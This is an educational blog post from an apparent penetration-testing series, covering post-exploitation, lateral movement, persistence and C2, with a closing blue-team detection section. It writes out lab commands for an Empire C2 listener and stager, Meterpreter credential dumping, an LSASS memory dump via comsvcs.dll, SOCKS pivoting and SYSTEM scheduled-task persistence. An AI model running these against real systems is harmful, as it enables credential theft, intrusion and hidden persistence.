July 2, 2026
Post-Exploitation & Lateral Movement
From “I’m In” to “I Own the Domain” — Understanding What Happens After Initial Access
By R. Mahathi
4 min read
Introduction
In Parts 1 through 6 of this series, we walked through VAPT fundamentals, reconnaissance, the difference between Vulnerability Assessment and Penetration Testing, network pentesting, Active Directory attacks, and web application pentesting. Every one of those phases builds toward a single moment: initial access.
But initial access is just the beginning of the story, not the end of it.
This part covers what a real attacker — and by extension, what a penetration tester emulating one — does after that first foothold: post-exploitation and lateral movement.
What Is Post-Exploitation?
Post-exploitation is everything that happens after an attacker successfully compromises a single host or account. It covers a cluster of related activities:
- Situational awareness — figuring out where you landed (what host, what user, what network segment, what domain)
- Privilege escalation — moving from a low-privilege foothold to admin/SYSTEM/root
- Credential harvesting — extracting usable credentials from memory, disk, or cached tickets
- Persistence — ensuring continued access even if the initial vector is patched or the session dies
- Lateral movement — using the compromised host as a pivot point to reach other systems
- Command and control (C2) — maintaining a communication channel back to the attacker's infrastructure
Why It Matters
Here's the uncomfortable truth most organizations don't want to hear:
Initial access is rarely the expensive part of a breach. Post-exploitation is.
A single phished laptop or one unpatched service is a containable incident. A domain admin account extracted three hops later, with persistence planted on five machines and a C2 channel disguised as normal HTTPS traffic, is a full-blown breach.
This is also why MITRE ATT&CK devotes entire tactic categories — Persistence, Privilege Escalation, Credential Access, Lateral Movement, Command and Control, Exfiltration — to this stage of the kill chain. Detection engineering, SIEM correlation rules (as we explored with Wazuh in earlier internship work), and threat hunting all exist primarily to catch attackers here, because catching them at initial access alone is statistically unlikely.
Subtopic 1: Empire
PowerShell Empire (and its modern fork, Empire 4 / BC-Security Empire) is a post-exploitation C2 framework built around PowerShell (Windows) and Python (cross-platform) agents.
Core concepts:
ConceptDescriptionListenerThe C2 server component waiting for agent check-insStagerInitial payload that establishes the first callbackAgentThe active implant running on the compromised hostModulePost-exploitation action (credential dumping, recon, lateral movement) run through an agent
Typical lab workflow:
# Start the Empire server
./ps-empire server
# In the client
listeners
uselistener http
set Host <C2_LISTENER_IP>
set Port 8080
execute
# Generate a stager
usestager multi/launcher
set Listener http
generate# Start the Empire server
./ps-empire server
# In the client
listeners
uselistener http
set Host <C2_LISTENER_IP>
set Port 8080
execute
# Generate a stager
usestager multi/launcher
set Listener http
generateOnce an agent checks in, operators can run recon modules (situational_awareness/*), credential modules, and lateral movement modules — all through an encrypted C2 channel.
Subtopic 2: Metasploit
Metasploit Framework remains the most widely used exploitation and post-exploitation platform in the industry, largely because of Meterpreter — its in-memory, modular post-exploitation payload.
Common post-exploitation Meterpreter commands used in lab engagements:
# Situational awareness
sysinfo
getuid
ps
# Privilege escalation
getsystem
# Credential access
load kiwi
creds_all
# Pivoting through a compromised host
run autoroute -s 10.10.20.0/24
use auxiliary/server/socks_proxy# Situational awareness
sysinfo
getuid
ps
# Privilege escalation
getsystem
# Credential access
load kiwi
creds_all
# Pivoting through a compromised host
run autoroute -s 10.10.20.0/24
use auxiliary/server/socks_proxyThe autoroute + socks_proxy combination is particularly important for pivoting — routing further scans and exploits through a compromised host to reach network segments that aren't directly reachable from the attacker's machine.
Subtopic 3: Credential Dumping
We've already covered credential dumping extensively in the Active Directory part of this series (Impacket's secretsdump.py, Hashcat, John the Ripper). In the post-exploitation context, credential dumping is the bridge between compromising one host and moving to the next.
Key sources attackers target:
- LSASS memory (via Mimikatz,
comsvcs.dllMiniDump technique, orprocdump) - SAM/SYSTEM registry hives
- NTDS.dit (domain-wide, if domain controller access is achieved)
- Cached domain credentials
- Browser-stored credentials and saved RDP/VPN configs
# Classic LSASS dump via comsvcs.dll (living-off-the-land)
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\temp\lsass.dmp full
# Offline parsing with pypykatz
pypykatz lsa minidump lsass.dmp# Classic LSASS dump via comsvcs.dll (living-off-the-land)
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <LSASS_PID> C:\temp\lsass.dmp full
# Offline parsing with pypykatz
pypykatz lsa minidump lsass.dmpThis maps directly to MITRE ATT&CK T1003 (OS Credential Dumping) — a technique category, not a single technique — with sub-techniques like T1003.001 (LSASS Memory) and T1003.003 (NTDS).
Subtopic 4: Pivoting
Pivoting is how a single compromised host becomes a launchpad into segments of the network the attacker couldn't otherwise reach — critical in environments like ours where PHANTOM.CORP, GHOST.CORP, and WRAITH.CORP may sit on different segments with varying trust levels.
Common pivoting techniques:
- SSH local/dynamic port forwarding (
ssh -D 1080 user@pivot-host) - Metasploit
autoroute+ SOCKS proxy chaining - Chisel / Ligolo-ng for fast TCP tunneling over restrictive firewalls
- RDP/SMB relay through a compromised jump box
# SSH dynamic SOCKS proxy through a compromised pivot host
ssh -D 1080 -N user@10.10.20.5
# Route further tools (e.g., nmap, proxychains) through it
proxychains nmap -sT -Pn 10.10.30.0/24# SSH dynamic SOCKS proxy through a compromised pivot host
ssh -D 1080 -N user@10.10.20.5
# Route further tools (e.g., nmap, proxychains) through it
proxychains nmap -sT -Pn 10.10.30.0/24Subtopic 5: Persistence Mechanisms
Persistence ensures the attacker survives reboots, credential rotations, or a patched initial vector. Common Windows persistence techniques encountered in lab and real-world engagements:
TechniqueMITRE ATT&CK IDRegistry Run keysT1547.001Scheduled TasksT1053.005Windows ServicesT1543.003WMI Event SubscriptionsT1546.003Golden/Silver Tickets (Kerberos)T1558DLL HijackingT1574.001
# Example: scheduled task persistence (lab use only)
schtasks /create /tn "UpdateCheck" /tr "C:\temp\agent.exe" /sc onlogon /ru SYSTEM# Example: scheduled task persistence (lab use only)
schtasks /create /tn "UpdateCheck" /tr "C:\temp\agent.exe" /sc onlogon /ru SYSTEMOn the AD side, techniques like Golden Ticket and DCSync provide extremely durable persistence because they abuse trust relationships in Kerberos rather than planting artifacts on disk — making them far harder to detect with traditional endpoint tooling alone.
Subtopic 6: Command and Control (C2) Frameworks
Beyond Empire and Metasploit, the modern C2 landscape includes:
- Cobalt Strike — industry-standard (and heavily abused by real threat actors) commercial C2
- Sliver — open-source, Go-based, cross-platform C2 gaining popularity in red teams
- Mythic — modular C2 framework supporting multiple agent types
- Covenant — .NET-based C2
C2 detection increasingly hinges on traffic pattern analysis (beaconing intervals, JA3/JA3S fingerprinting, malleable C2 profile detection) rather than signature-based detection, since modern C2 traffic is designed to blend into legitimate HTTPS/DNS traffic.
Defensive Mapping (Blue Team Perspective)
Given the SIEM work done earlier in this internship with Wazuh, it's worth tying this back to detection:
- Failed/successful logon anomalies → T1110 family
- LSASS access from non-standard processes → T1003.001
- New scheduled tasks / services created outside change windows → T1053 / T1543
- Unusual SMB/RDP lateral connections between workstations (not server → workstation) → lateral movement indicator
- Long-lived outbound connections with regular beacon intervals → C2 indicator
Each of these can be turned into a Sigma rule and translated to SPL/Wazuh rules, as covered in earlier parts of this internship's defensive tooling work.
Key Takeaways
- Initial access is the beginning of risk, not the end of it.
- Post-exploitation is where attackers convert a single foothold into organizational compromise.
- Credential dumping is the connective tissue between compromising one host and moving to the next.
- Persistence and C2 are designed to survive detection and remediation attempts — defenders must assume attackers will try to stay.
- Every offensive technique here has a corresponding MITRE ATT&CK ID and a corresponding detection opportunity — red and blue are two sides of the same coin.
This article is part of an ongoing series exploring practical, hands-on VAPT concepts — from reconnaissance to post-exploitation. If you found this useful, follow along for the rest of the series, and feel free to share your own experiences with these tools and techniques.